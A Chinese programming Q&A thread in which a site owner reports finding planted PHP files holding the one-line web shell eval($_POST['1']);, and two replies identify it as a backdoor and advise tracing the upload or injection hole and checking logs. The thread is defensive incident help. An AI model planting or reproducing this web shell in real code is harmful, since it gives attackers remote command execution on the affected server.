首頁猿問網(wǎng)站多了幾個PHP文件，eval(...

網(wǎng)站多了幾個PHP文件，eval($_POST['1']);

JavaScript

呼啦一陣風(fēng) 2019-04-09 20:25:15

網(wǎng)站多了幾個PHP，內(nèi)容如下：eval($_POST['1']);有的是其他內(nèi)容，我百度了一下發(fā)現(xiàn)時執(zhí)行某些命令的，我測試了一下如果權(quán)限沒限制好的話確實(shí)可以執(zhí)行一些命令。請問除了設(shè)置權(quán)限，從代碼級別可否做限制呢？有沒有什么好辦法呢？還有個PHP文件內(nèi)容如下：還有文件，名字是：13686921256303.virus_killed內(nèi)容是：請各位出出注意，謝謝了。

查看完整描述

2 回答

蝴蝶刀刀

TA貢獻(xiàn)1801條經(jīng)驗(yàn) 獲得超8個贊

明顯的是被上傳一句話木馬了??！可以通過菜刀直接連接的，可以執(zhí)行很多命令。修復(fù)的話要從根本上修復(fù)，看下網(wǎng)站是不是有上傳漏洞，sql注入等問題。可以查看http的訪問日志來看利用這個一句話執(zhí)行了什么操作，排查網(wǎng)站是不是被提權(quán)，獲取了服務(wù)器權(quán)限等。

反對回復(fù) 2019-04-09

qq_遁去的一_1

TA貢獻(xiàn)1725條經(jīng)驗(yàn) 獲得超8個贊

修正要修正根上。與其費(fèi)心讓病毒代碼“不能運(yùn)行”，倒不如尋找病毒進(jìn)入的來源——是從PHP程序的漏洞引入的，還是從服務(wù)器環(huán)境的不安全引入的。另外提一下，使用虛擬主機(jī)在安全性上可能不是一個好主意。因?yàn)槟闩c他人分享不隔離的物理設(shè)備與LAMP環(huán)境，雖然理論上Linux下用戶之間的隔離很好，但實(shí)際上不隔離開還是風(fēng)險(xiǎn)很高。

反對回復(fù) 2019-04-09